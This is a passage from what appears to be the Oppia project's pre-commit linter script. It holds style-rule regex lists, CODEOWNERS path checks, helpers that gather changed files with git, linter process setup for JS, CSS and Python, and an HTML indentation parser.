'message': 'Please ensure this file contains the unicode_literals '
'future import.',
'included_types': ('.py',),
'excluded_files': GENERATED_FILE_PATHS + CONFIG_FILE_PATHS + (
'__init__.py',),
'excluded_dirs': EXCLUDED_PATHS
}
]
MANDATORY_PATTERNS_JS_REGEXP = [
{
'regexp': re.compile(r'^\s\*\s@fileoverview\s[a-zA-Z0-9_]+'),
'message': 'Please ensure this file contains a file '
'overview, i.e. a short description of the file.',
'included_types': ('.js', '.ts'),
'excluded_files': GENERATED_FILE_PATHS + CONFIG_FILE_PATHS,
'excluded_dirs': EXCLUDED_PATHS
}
]
BAD_LINE_PATTERNS_HTML_REGEXP = [
{
'regexp': re.compile(r'text\/ng-template'),
'message': 'The directives must be directly referenced.',
'excluded_files': (),
'excluded_dirs': (
'extensions/answer_summarizers/',
'extensions/classifiers/',
'extensions/objects/',
'extensions/value_generators/')
},
{
'regexp': re.compile(r'[ \t]+$'),
'message': 'There should not be any trailing whitespaces.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\$parent'),
'message': 'Please do not access parent properties ' +
'using $parent. Use the scope object ' +
'for this purpose.',
'excluded_files': (),
'excluded_dirs': ()
}
]
BAD_PATTERNS_PYTHON_REGEXP = [
{
'regexp': re.compile(r'\Wprint\('),
'message': 'Please do not use print statement.',
'excluded_files': (
'core/tests/test_utils.py',
'core/tests/performance_framework/perf_domain.py'),
'excluded_dirs': ('scripts/',)
},
{
'regexp': re.compile(r'\sprint\('),
'message': 'Please use python_utils.PRINT().',
'excluded_files': ('python_utils.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'# pylint:\s*disable=[A-Z][0-9]{4}'),
'message': 'Please remove pylint exclusion if it is unnecessary, or '
'make it human readable with a sentence instead of an id. '
'The id-to-message list can be seen '
'here->http://pylint-messages.wikidot.com/all-codes',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'self.assertEquals\('),
'message': 'Please do not use self.assertEquals method. ' +
'This method has been deprecated. Instead use ' +
'self.assertEqual method.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'with open\(|= open\('),
'message': 'Please use python_utils.open_file() instead of open().',
'excluded_files': ('python_utils.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'StringIO'),
'message': 'Please use python_utils.string_io() instead of ' +
'import StringIO.',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urllib\..*quote\('),
'message': 'Please use python_utils.url_quote().',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urllib\..*unquote_plus\('),
'message': 'Please use python_utils.url_unquote_plus().',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urllib\..*urlencode\('),
'message': 'Please use python_utils.url_encode().',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urllib\..*urlretrieve\('),
'message': 'Please use python_utils.url_retrieve().',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urllib(2)?\..*urlopen\('),
'message': 'Please use python_utils.url_open().',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urlsplit'),
'message': 'Please use python_utils.url_split().',
'excluded_files': ('python_utils.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urlparse'),
'message': 'Please use python_utils.url_parse().',
'excluded_files': ('python_utils.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urlunsplit'),
'message': 'Please use python_utils.url_unsplit().',
'excluded_files': ('python_utils.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'parse_qs'),
'message': 'Please use python_utils.parse_query_string().',
'excluded_files': ('python_utils.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\Wunquote\('),
'message': 'Please use python_utils.urllib_unquote().',
'excluded_files': ('python_utils.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urljoin'),
'message': 'Please use python_utils.url_join().',
'excluded_files': ('python_utils.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urllib(2)?\..*Request\('),
'message': 'Please use python_utils.url_request().',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'[^.|\w]input\('),
'message': 'Please use python_utils.INPUT.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'[^.|\w|\s]map\('),
'message': 'Please use python_utils.MAP.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\Wnext\('),
'message': 'Please use python_utils.NEXT.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'object\):'),
'message': 'Please use python_utils.OBJECT.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\Wrange\('),
'message': 'Please use python_utils.RANGE.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\Wround\('),
'message': 'Please use python_utils.ROUND.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\Wstr\('),
'message': (
'Please try to use python_utils.convert_to_bytes() for the strings '
'used in webapp2\'s built-in methods or for strings used directly '
'in NDB datastore models. If you need to cast ints/floats to '
'strings, please use python_utils.UNICODE() instead.'),
'excluded_files': ('python_utils.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\Wzip\('),
'message': 'Please use python_utils.ZIP.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'basestring'),
'message': 'Please use python_utils.BASESTRING.',
'excluded_files': ('python_utils.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'__metaclass__'),
'message': 'Please use python_utils.with_metaclass().',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'iteritems'),
'message': 'Please use items() instead.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'itervalues'),
'message': 'Please use values() instead.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'iterkeys'),
'message': 'Please use keys() instead.',
'excluded_files': (),
'excluded_dirs': ()
}
]
BAD_PATTERNS_MAP = {
'.js': BAD_PATTERNS_JS_AND_TS_REGEXP,
'.ts': BAD_PATTERNS_JS_AND_TS_REGEXP,
'.html': BAD_LINE_PATTERNS_HTML_REGEXP,
'.py': BAD_PATTERNS_PYTHON_REGEXP
}
REQUIRED_STRINGS_CONSTANTS = {
'DEV_MODE: true': {
'message': 'Please set the DEV_MODE variable in constants.ts '
'to true before committing.',
'excluded_files': ()
}
}
ALLOWED_TERMINATING_PUNCTUATIONS = ['.', '?', '}', ']', ')']
CODEOWNER_FILEPATH = '.github/CODEOWNERS'
# This list needs to be in sync with the important patterns in the CODEOWNERS
# file.
CODEOWNER_IMPORTANT_PATHS = [
'/core/controllers/acl_decorators*.py',
'/core/controllers/base*.py',
'/core/domain/html*.py',
'/core/domain/rights_manager*.py',
'/core/domain/role_services*.py',
'/core/domain/user*.py',
'/core/storage/',
'/export/',
'/manifest.json',
'/package.json',
'/yarn.lock',
'/scripts/install_third_party_libs.py',
'/.github/']
if not os.getcwd().endswith('oppia'):
python_utils.PRINT('')
python_utils.PRINT(
'ERROR Please run this script from the oppia root directory.')
_PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
_PYLINT_PATH = os.path.join(_PARENT_DIR, 'oppia_tools', 'pylint-1.9.4')
if not os.path.exists(_PYLINT_PATH):
python_utils.PRINT('')
python_utils.PRINT(
'ERROR Please run install_third_party_libs.py first to install pylint')
python_utils.PRINT(' and its dependencies.')
sys.exit(1)
_PATHS_TO_INSERT = [
_PYLINT_PATH,
os.getcwd(),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'google_appengine_1.9.67',
'google_appengine', 'lib', 'webapp2-2.3'),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'google_appengine_1.9.67',
'google_appengine', 'lib', 'yaml-3.10'),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'google_appengine_1.9.67',
'google_appengine', 'lib', 'jinja2-2.6'),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'google_appengine_1.9.67',
'google_appengine'),
os.path.join(_PARENT_DIR, 'oppia_tools', 'webtest-2.0.33'),
os.path.join(_PARENT_DIR, 'oppia_tools', 'browsermob-proxy-0.8.0'),
os.path.join(_PARENT_DIR, 'oppia_tools', 'esprima-4.0.1'),
os.path.join(_PARENT_DIR, 'oppia_tools', 'pycodestyle-2.5.0'),
os.path.join(_PARENT_DIR, 'oppia_tools', 'pylint-quotes-0.1.8'),
os.path.join(_PARENT_DIR, 'oppia_tools', 'selenium-3.13.0'),
os.path.join(_PARENT_DIR, 'oppia_tools', 'PyGithub-1.43.7'),
os.path.join(_PARENT_DIR, 'oppia_tools', 'Pillow-6.0.0'),
os.path.join('third_party', 'backports.functools_lru_cache-1.5'),
os.path.join('third_party', 'beautifulsoup4-4.7.1'),
os.path.join('third_party', 'bleach-3.1.0'),
os.path.join('third_party', 'callbacks-0.3.0'),
os.path.join('third_party', 'gae-cloud-storage-1.9.22.1'),
os.path.join('third_party', 'gae-mapreduce-1.9.22.0'),
os.path.join('third_party', 'gae-pipeline-1.9.22.1'),
os.path.join('third_party', 'mutagen-1.42.0'),
os.path.join('third_party', 'soupsieve-1.9.1'),
os.path.join('third_party', 'six-1.12.0'),
os.path.join('third_party', 'webencodings-0.5.1'),
]
for path in _PATHS_TO_INSERT:
sys.path.insert(0, path)
# pylint: disable=wrong-import-order
# pylint: disable=wrong-import-position
import isort # isort:skip
import pycodestyle # isort:skip
import esprima # isort:skip
from pylint import lint # isort:skip
from . import build # isort:skip
from . import docstrings_checker # isort:skip
import html.parser # isort:skip
# pylint: enable=wrong-import-order
# pylint: enable=wrong-import-position
_MESSAGE_TYPE_SUCCESS = 'SUCCESS'
_MESSAGE_TYPE_FAILED = 'FAILED'
_TARGET_STDOUT = python_utils.string_io()
_STDOUT_LIST = multiprocessing.Manager().list()
_FILES = multiprocessing.Manager().dict()
class FileCache(python_utils.OBJECT):
"""Provides thread-safe access to cached file content."""
def __init__(self):
self._CACHE_DATA_DICT = {}
def read(self, filepath, mode='r'):
"""Returns the data read from the file in unicode form.
Args:
filepath: str. The file path from which data is to be read.
mode: str. The mode in which the file is to be opened.
Returns:
str. The data read from the file.
"""
return self._get_data(filepath, mode)[0]
def readlines(self, filepath, mode='r'):
"""Returns the tuple containing data line by line as read from the
file in unicode form.
Args:
filepath: str. The file path from which data is to be read.
mode: str. The mode in which the file is to be opened.
Returns:
tuple(str). The tuple containing data line by line as read from the
file.
"""
return self._get_data(filepath, mode)[1]
def _get_data(self, filepath, mode):
"""Returns the collected data from the file corresponding to the given
filepath.
Args:
filepath: str. The file path from which data is to be read.
mode: str. The mode in which the file is to be opened.
Returns:
tuple(str, tuple(str)). The tuple containing data read from the file
as first element and tuple containing the text line by line as
second element.
"""
key = (filepath, mode)
if key not in self._CACHE_DATA_DICT:
with python_utils.open_file(filepath, mode) as f:
lines = f.readlines()
self._CACHE_DATA_DICT[key] = (''.join(lines), tuple(lines))
return self._CACHE_DATA_DICT[key]
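# Illustrative sketch: the checks below read files through a shared
# module-level FileCache instance (FILE_CACHE), so repeated reads of the same
# path hit the cache, e.g.
#     FILE_CACHE.read('.github/CODEOWNERS')       # full text, cached
#     FILE_CACHE.readlines('.github/CODEOWNERS')  # tuple of lines, same entry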
def _lint_all_files(
js_filepaths, ts_filepaths, py_filepaths, html_filepaths,
css_filepaths, verbose_mode_enabled):
"""This function is used to check if node-eslint dependencies are
installed and pass ESLint binary path and lint all the files(JS, Python,
HTML, CSS) with their respective third party linters.
Args:
js_filepaths: list(str). The list of js filepaths to be linted.
ts_filepaths: list(str). The list of ts filepaths to be linted.
py_filepaths: list(str). The list of python filepaths to be linted.
html_filepaths: list(str). The list of HTML filepaths to be linted.
css_filepaths: list(str). The list of CSS filepaths to be linted.
verbose_mode_enabled: bool. True if verbose mode is enabled.
Returns:
linting_processes: list(multiprocessing.Process). A list of linting
processes.
result_queues: list(multiprocessing.Queue). A list of queues to put
results of tests.
stdout_queues: list(multiprocessing.Queue). A list of queues to store
Stylelint outputs.
"""
python_utils.PRINT('Starting Js, Ts, Python, HTML, and CSS linter...')
pylintrc_path = os.path.join(os.getcwd(), '.pylintrc')
config_pylint = '--rcfile=%s' % pylintrc_path
config_pycodestyle = os.path.join(os.getcwd(), 'tox.ini')
parent_dir = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
node_path = os.path.join(
parent_dir, 'oppia_tools', 'node-10.15.3', 'bin', 'node')
eslint_path = os.path.join(
'node_modules', 'eslint', 'bin', 'eslint.js')
stylelint_path = os.path.join(
'node_modules', 'stylelint', 'bin', 'stylelint.js')
config_path_for_css_in_html = os.path.join(
parent_dir, 'oppia', '.stylelintrc')
config_path_for_oppia_css = os.path.join(
parent_dir, 'oppia', 'core', 'templates', 'dev', 'head',
'css', '.stylelintrc')
if not (os.path.exists(eslint_path) and os.path.exists(stylelint_path)):
python_utils.PRINT('')
python_utils.PRINT(
'ERROR Please run start.sh first to install node-eslint ')
python_utils.PRINT(
' or node-stylelint and its dependencies.')
sys.exit(1)
js_and_ts_files_to_lint = js_filepaths + ts_filepaths
linting_processes = []
js_and_ts_result = multiprocessing.Queue()
linting_processes.append(multiprocessing.Process(
target=_lint_js_and_ts_files, args=(
node_path, eslint_path, js_and_ts_files_to_lint,
js_and_ts_result, verbose_mode_enabled)))
css_in_html_result = multiprocessing.Queue()
css_in_html_stdout = multiprocessing.Queue()
linting_processes.append(multiprocessing.Process(
target=_lint_css_files, args=(
node_path,
stylelint_path,
config_path_for_css_in_html,
html_filepaths, css_in_html_stdout,
css_in_html_result, verbose_mode_enabled)))
css_result = multiprocessing.Queue()
css_stdout = multiprocessing.Queue()
linting_processes.append(multiprocessing.Process(
target=_lint_css_files, args=(
node_path,
stylelint_path,
config_path_for_oppia_css,
css_filepaths, css_stdout,
css_result, verbose_mode_enabled)))
py_result = multiprocessing.Queue()
linting_processes.append(multiprocessing.Process(
target=_lint_py_files,
args=(
config_pylint, config_pycodestyle, py_filepaths,
py_result, verbose_mode_enabled)))
py_result_for_python3_compatibility = multiprocessing.Queue()
linting_processes.append(multiprocessing.Process(
target=_lint_py_files_for_python3_compatibility,
args=(
py_filepaths, py_result_for_python3_compatibility,
verbose_mode_enabled)))
for process in linting_processes:
process.daemon = False
process.start()
result_queues = [
js_and_ts_result, css_in_html_result, css_result, py_result,
py_result_for_python3_compatibility
]
stdout_queues = [
css_in_html_stdout, css_stdout
]
return linting_processes, result_queues, stdout_queues
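# Hedged usage sketch (the actual driver lives elsewhere in this script and
# may differ): the processes are already started above, so a caller would
# typically just join them and drain the queues, e.g.
#     processes, result_queues, stdout_queues = _lint_all_files(
#         js_files, ts_files, py_files, html_files, css_files, verbose)
#     for process in processes:
#         process.join()
#     for queue in result_queues:
#         while not queue.empty():
#             python_utils.PRINT(queue.get())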
def _is_filepath_excluded_for_bad_patterns_check(pattern, filepath):
"""Checks if file is excluded from the bad patterns check.
Args:
pattern: str. The pattern to be checked against.
filepath: str. Path of the file.
Returns:
bool: Whether to exclude the given file from this
particular pattern check.
"""
return (any(filepath.startswith(bad_pattern)
for bad_pattern in BAD_PATTERNS[pattern]['excluded_dirs'])
or filepath in BAD_PATTERNS[pattern]['excluded_files'])
def _get_expression_from_node_if_one_exists(
parsed_node, components_to_check):
"""This function first checks whether the parsed node represents
the required angular component that needs to be derived by checking if
it is in the 'components_to_check' list. If yes, then it will return the
expression part of the node from which the component can be derived.
If no, it will return None. It is done by filtering out
'AssignmentExpression' (as it represents an assignment) and 'Identifier'
(as it represents a static expression).
Args:
parsed_node: dict. Parsed node of the body of a JS file.
components_to_check: list(str). List of angular components to check
in a JS file. These include directives, factories, controllers,
etc.
Returns:
expression: dict or None. Expression part of the node if the node
represents a component else None.
"""
if parsed_node.type != 'ExpressionStatement':
return
# Separate the expression part of the node which is the actual
# content of the node.
expression = parsed_node.expression
# Check whether the expression belongs to a
# 'CallExpression' which always contains a call
# and not an 'AssignmentExpression'.
# For example, func() is a CallExpression.
if expression.type != 'CallExpression':
return
# Check whether the expression belongs to a 'MemberExpression' which
# represents a computed expression or an Identifier which represents
# a static expression.
# For example, 'thing.func' is a MemberExpression where
# 'thing' is the object of the MemberExpression and
# 'func' is the property of the MemberExpression.
# Another example of a MemberExpression within a CallExpression is
# 'thing.func()' where 'thing.func' is the callee of the CallExpression.
if expression.callee.type != 'MemberExpression':
return
# Get the component in the JS file.
component = expression.callee.property.name
if component not in components_to_check:
return
return expression
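# Illustrative sketch (hypothetical input): for JS source such as
#     oppia.directive('fooBar', ['$scope', function($scope) {...}]);
# esprima parses the statement into an ExpressionStatement whose expression is
# a CallExpression with a MemberExpression callee ('oppia.directive'), so
# calling this function with components_to_check=['directive'] returns that
# expression, while a plain assignment like "var x = 1;" yields None.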
def _walk_with_gitignore(root, exclude_dirs):
"""A walk function similar to os.walk but this would ignore the files and
directories which is not tracked by git. Also, this will ignore the
directories mentioned in exclude_dirs.
Args:
root: str. The path from where the function should start walking.
exclude_dirs: list(str). A list of dir path which should be ignored.
Yields:
list(str). A list of unignored files.
"""
dirs, file_paths = [], []
for name in os.listdir(root):
if os.path.isdir(os.path.join(root, name)):
dirs.append(os.path.join(root, name))
else:
file_paths.append(os.path.join(root, name))
yield [file_path for file_path in file_paths if not _is_path_ignored(
file_path)]
for dir_path in dirs:
# Adding "/" in the end of the dir path according to the git dir path
# structure.
if (not _is_path_ignored(dir_path + '/')) and (
dir_path not in exclude_dirs):
for x in _walk_with_gitignore(dir_path, exclude_dirs):
yield x
def _is_path_ignored(path_to_check):
"""Checks whether the given path is ignored by git.
Args:
path_to_check: str. A path to a file or a dir.
Returns:
bool. Whether the given path is ignored by git.
"""
command = ['git', 'check-ignore', '-q', path_to_check]
# The "git check-ignore <path>" command returns 0 when the path is ignored
# otherwise it returns 1. subprocess.call then returns this returncode.
if subprocess.call(command):
return False
else:
return True
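# Illustrative sketch (hypothetical paths): with a .gitignore entry such as
# "node_modules/", _is_path_ignored('node_modules/') returns True because
# "git check-ignore -q node_modules/" exits with status 0, whereas a tracked
# path like 'core/controllers/base.py' makes the command exit with status 1,
# so the function returns False.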
def _get_changed_filepaths():
"""Returns a list of modified files (both staged and unstaged)
Returns:
a list of filepaths of modified files.
"""
unstaged_files = subprocess.check_output([
'git', 'diff', '--name-only',
'--diff-filter=ACM']).splitlines()
staged_files = subprocess.check_output([
'git', 'diff', '--cached', '--name-only',
'--diff-filter=ACM']).splitlines()
all_changed_filepaths = unstaged_files + staged_files
return [filepath for filepath in all_changed_filepaths]
def _get_all_files_in_directory(dir_path, excluded_glob_patterns):
"""Recursively collects all files in directory and
subdirectories of specified path.
Args:
dir_path: str. Path to the folder to be linted.
excluded_glob_patterns: set(str). Set of all glob patterns
to be excluded.
Returns:
a list of files in directory and subdirectories without excluded files.
"""
files_in_directory = []
for _dir, _, files in os.walk(dir_path):
for file_name in files:
filepath = os.path.relpath(
os.path.join(_dir, file_name), os.getcwd())
if not any([fnmatch.fnmatch(filepath, gp) for gp in
excluded_glob_patterns]):
files_in_directory.append(filepath)
return files_in_directory
@contextlib.contextmanager
def _redirect_stdout(new_target):
"""Redirect stdout to the new target.
Args:
new_target: TextIOWrapper. The new target to which stdout is redirected.
Yields:
TextIOWrapper. The new target.
"""
old_target = sys.stdout
sys.stdout = new_target
try:
yield new_target
finally:
sys.stdout = old_target
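# Illustrative sketch: the checks below use this to capture linter output,
# roughly
#     with _redirect_stdout(_TARGET_STDOUT):
#         python_utils.PRINT('captured')   # written into _TARGET_STDOUT
#     # sys.stdout is restored here; _TARGET_STDOUT.getvalue() holds the text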
def _get_all_filepaths(input_path, input_filenames):
"""This function is used to return the filepaths which needs to be linted
and checked.
Args:
input_path: str. The path of the directory to be linted and checked.
input_filenames: list(str). The list of filenames to be linted and
checked, ignored if input_path is specified.
Returns:
all_filepaths: list(str). The list of filepaths to be linted and
checked.
"""
eslintignore_path = os.path.join(os.getcwd(), '.eslintignore')
if input_path:
input_path = os.path.join(os.getcwd(), input_path)
if not os.path.exists(input_path):
python_utils.PRINT(
'Could not locate file or directory %s. Exiting.' % input_path)
python_utils.PRINT('----------------------------------------')
sys.exit(1)
if os.path.isfile(input_path):
all_filepaths = [input_path]
else:
excluded_glob_patterns = FILE_CACHE.readlines(eslintignore_path)
all_filepaths = _get_all_files_in_directory(
input_path, excluded_glob_patterns)
elif input_filenames:
valid_filepaths = []
invalid_filepaths = []
for filename in input_filenames:
if os.path.isfile(filename):
valid_filepaths.append(filename)
else:
invalid_filepaths.append(filename)
if invalid_filepaths:
python_utils.PRINT(
'The following file(s) do not exist: %s\n'
'Exiting.' % invalid_filepaths)
sys.exit(1)
all_filepaths = valid_filepaths
else:
all_filepaths = _get_changed_filepaths()
all_filepaths = [
filename for filename in all_filepaths if not
any(fnmatch.fnmatch(filename, pattern) for pattern in EXCLUDED_PATHS)]
return all_filepaths
def _check_bad_pattern_in_file(filepath, file_content, pattern):
"""Detects whether the given pattern is present in the file.
Args:
filepath: str. Path of the file.
file_content: str. Contents of the file.
pattern: dict. (regexp(regex pattern) : pattern to match,
message(str) : message to show if pattern matches,
excluded_files(tuple(str)) : files to be excluded from matching,
excluded_dirs(tuple(str)) : directories to be excluded from
matching).
Object containing details for the pattern to be checked.
Returns:
bool. True if the bad pattern is present in the file, else False.
"""
regexp = pattern['regexp']
if not (any(filepath.startswith(excluded_dir)
for excluded_dir in pattern['excluded_dirs'])
or filepath in pattern['excluded_files']):
bad_pattern_count = 0
for line_num, line in enumerate(file_content.split('\n'), 1):
if line.endswith('disable-bad-pattern-check'):
continue
if regexp.search(line):
python_utils.PRINT('%s --> Line %s: %s' % (
filepath, line_num, pattern['message']))
python_utils.PRINT('')
bad_pattern_count += 1
if bad_pattern_count:
return True
return False
def _check_file_type_specific_bad_pattern(filepath, content):
"""Check the file content based on the file's extension.
Args:
filepath: str. Path of the file.
content: str. Contents of the file.
Returns:
failed: bool. True if a bad pattern is present, else False.
total_error_count: int. The number of errors.
"""
_, extension = os.path.splitext(filepath)
pattern = BAD_PATTERNS_MAP.get(extension)
failed = False
total_error_count = 0
if pattern:
for regexp in pattern:
if _check_bad_pattern_in_file(filepath, content, regexp):
failed = True
total_error_count += 1
return failed, total_error_count
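# Illustrative sketch (hypothetical file): running
#     _check_file_type_specific_bad_pattern('sample.py', 'x = str(5)\n')
# looks up BAD_PATTERNS_PYTHON_REGEXP via the '.py' extension; the r'\Wstr\('
# rule matches, a message pointing at line 1 is printed, and the function
# returns (True, 1) for that content.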
class TagMismatchException(Exception):
"""Error class for mismatch between start and end tags."""
pass
class CustomHTMLParser(html.parser.HTMLParser):
"""Custom HTML parser to check indentation."""
def __init__(self, filepath, file_lines, debug, failed=False):
"""Define various variables to parse HTML.
Args:
filepath: str. path of the file.
file_lines: list(str). list of the lines in the file.
debug: bool. if true prints tag_stack for the file.
failed: bool. true if the HTML indentation check fails.
"""
html.parser.HTMLParser.__init__(self)
self.tag_stack = []
self.debug = debug
self.failed = failed
self.filepath = filepath
self.file_lines = file_lines
self.indentation_level = 0
self.indentation_width = 2
self.void_elements = [
'area', 'base', 'br', 'col', 'embed',
'hr', 'img', 'input', 'link', 'meta',
'param', 'source', 'track', 'wbr']
def handle_starttag(self, tag, attrs):
"""Handle start tag of a HTML line.
Args:
tag: str. start tag of a HTML line.
attrs: list(str). list of attributes in the start tag.
"""
line_number, column_number = self.getpos()
# Check the indentation of the tag.
expected_indentation = self.indentation_level * self.indentation_width
tag_line = self.file_lines[line_number - 1].lstrip()
opening_tag = '<' + tag
# Check the indentation for content of style tag.
if tag_line.startswith(opening_tag) and tag == 'style':
# Getting next line after style tag.
next_line = self.file_lines[line_number]
next_line_expected_indentation = (
self.indentation_level + 1) * self.indentation_width
next_line_column_number = len(next_line) - len(next_line.lstrip())
if next_line_column_number != next_line_expected_indentation:
python_utils.PRINT(
'%s --> Expected indentation '
'of %s, found indentation of %s '
'for content of %s tag on line %s ' % (
self.filepath, next_line_expected_indentation,
next_line_column_number, tag, line_number + 1))
python_utils.PRINT('')
self.failed = True
if tag_line.startswith(opening_tag) and (
column_number != expected_indentation):
python_utils.PRINT(
'%s --> Expected indentation '
'of %s, found indentation of %s '
'for %s tag on line %s ' % (
self.filepath, expected_indentation,
column_number, tag, line_number))
python_utils.PRINT('')
self.failed = True
if tag not in self.void_elements:
self.tag_stack.append((tag, line_number, column_number))
self.indentation_level += 1
if self.debug:
python_utils.PRINT('DEBUG MODE: Start tag_stack')
python_utils.PRINT(self.tag_stack)
# Check the indentation of the attributes of the tag.
indentation_of_first_attribute = (
column_number + len(tag) + 2)
starttag_text = self.get_starttag_text()
# Check whether the values of all attributes are placed
# in double quotes.
for attr, value in attrs:
# Not all attributes will have a value.
# Therefore the check should run only for those
# attributes which have a value.
if value:
expected_value = '"' + value + '"'
# " is rendered as a double quote by the parser.
if '"' in starttag_text:
rendered_text = starttag_text.replace('"', '"')
else:
rendered_text = starttag_text
if not expected_value in rendered_text:
self.failed = True
python_utils.PRINT(
'%s --> The value %s of attribute '
'%s for the tag %s on line %s should '
'be enclosed within double quotes.' % (
self.filepath, value, attr,
tag, line_number))
python_utils.PRINT('')
for line_num, line in enumerate(starttag_text.splitlines()):
if line_num == 0:
continue
leading_spaces_count = len(line) - len(line.lstrip())
list_of_attrs = []
for attr, _ in attrs:
list_of_attrs.append(attr)
if not line.lstrip().startswith(tuple(list_of_attrs)):
continue
if indentation_of_first_attribute != leading_spaces_count:
line_num_of_error = line_number + line_num
python_utils.PRINT(
'%s --> Attribute for tag %s on line '
'%s should align with the leftmost '
'attribute on line %s ' % (
self.filepath, tag,
line_num_of_error, line_number))
python_utils.PRINT('')
self.failed = True
def handle_endtag(self, tag):
"""Handle end tag of a HTML line.
Args:
tag: str. end tag of a HTML line.
"""
line_number, _ = self.getpos()
tag_line = self.file_lines[line_number - 1]
leading_spaces_count = len(tag_line) - len(tag_line.lstrip())
try:
last_starttag, last_starttag_line_num, last_starttag_col_num = (
self.tag_stack.pop())
except IndexError:
raise TagMismatchException('Error in line %s of file %s\n' % (
line_number, self.filepath))
if last_starttag != tag:
raise TagMismatchException('Error in line %s of file %s\n' % (
line_number, self.filepath))
if leading_spaces_count != last_starttag_col_num and (
last_starttag_line_num != line_number):
python_utils.PRINT(
'%s --> Indentation for end tag %s on line '
'%s does not match the indentation of the '
'start tag %s on line %s ' % (
self.filepath, tag, line_number,
last_starttag, last_starttag_line_num))
python_utils.PRINT('')
self.failed = True
self.indentation_level -= 1
if self.debug:
python_utils.PRINT('DEBUG MODE: End tag_stack')
python_utils.PRINT(self.tag_stack)
def handle_data(self, data):
"""Handle indentation level.
Args:
data: str. contents of HTML file to be parsed.
"""
data_lines = data.split('\n')
opening_block = tuple(
['{% block', '{% macro', '{% if', '% for', '% if'])
ending_block = tuple(['{% end', '{%- end', '% } %>'])
for data_line in data_lines:
data_line = data_line.lstrip()
if data_line.startswith(opening_block):
self.indentation_level += 1
elif data_line.startswith(ending_block):
self.indentation_level -= 1
def check_for_important_patterns_at_bottom_of_codeowners(important_patterns):
"""Checks that the most important patterns are at the bottom
of the CODEOWNERS file.
Arguments:
important_patterns: list(str). List of the important
patterns for CODEOWNERS file.
Returns:
bool. Whether the CODEOWNERS "important pattern" check fails.
"""
failed = False
# Check that there are no duplicate elements in the lists.
important_patterns_set = set(important_patterns)
codeowner_important_paths_set = set(CODEOWNER_IMPORTANT_PATHS)
if len(important_patterns_set) != len(important_patterns):
python_utils.PRINT(
'%s --> Duplicate pattern(s) found in critical rules'
' section.' % CODEOWNER_FILEPATH)
failed = True
if len(codeowner_important_paths_set) != len(CODEOWNER_IMPORTANT_PATHS):
python_utils.PRINT(
'scripts/pre_commit_linter.py --> Duplicate pattern(s) found '
'in CODEOWNER_IMPORTANT_PATHS list.')
failed = True
# Check missing rules by set difference operation.
critical_rule_section_minus_list_set = (
important_patterns_set.difference(codeowner_important_paths_set))
list_minus_critical_rule_section_set = (
codeowner_important_paths_set.difference(important_patterns_set))
for rule in critical_rule_section_minus_list_set:
python_utils.PRINT(
'%s --> Rule %s is not present in the '
'CODEOWNER_IMPORTANT_PATHS list in '
'scripts/pre_commit_linter.py. Please add this rule in the '
'mentioned list or remove this rule from the \'Critical files'
'\' section.' % (CODEOWNER_FILEPATH, rule))
failed = True
for rule in list_minus_critical_rule_section_set:
python_utils.PRINT(
'%s --> Rule \'%s\' is not present in the \'Critical files\' '
'section. Please place it under the \'Critical files\' '
'section since it is an important rule. Alternatively please '
'remove it from the \'CODEOWNER_IMPORTANT_PATHS\' list in '
'scripts/pre_commit_linter.py if it is no longer an '
'important rule.' % (CODEOWNER_FILEPATH, rule))
failed = True
return failed
def _lint_css_files(
node_path, stylelint_path, config_path, files_to_lint, stdout, result,
verbose_mode_enabled):
"""Prints a list of lint errors in the given list of CSS files.
Args:
node_path: str. Path to the node binary.
stylelint_path: str. Path to the Stylelint binary.
config_path: str. Path to the configuration file.
files_to_lint: list(str). A list of filepaths to lint.
stdout: multiprocessing.Queue. A queue to store Stylelint outputs.
result: multiprocessing.Queue. A queue to put results of test.
verbose_mode_enabled: bool. True if verbose mode is enabled.
"""
start_time = time.time()
num_files_with_errors = 0
num_css_files = len(files_to_lint)
if not files_to_lint:
result.put('')
python_utils.PRINT('There are no CSS files to lint.')
return
python_utils.PRINT('Total css files: ', num_css_files)
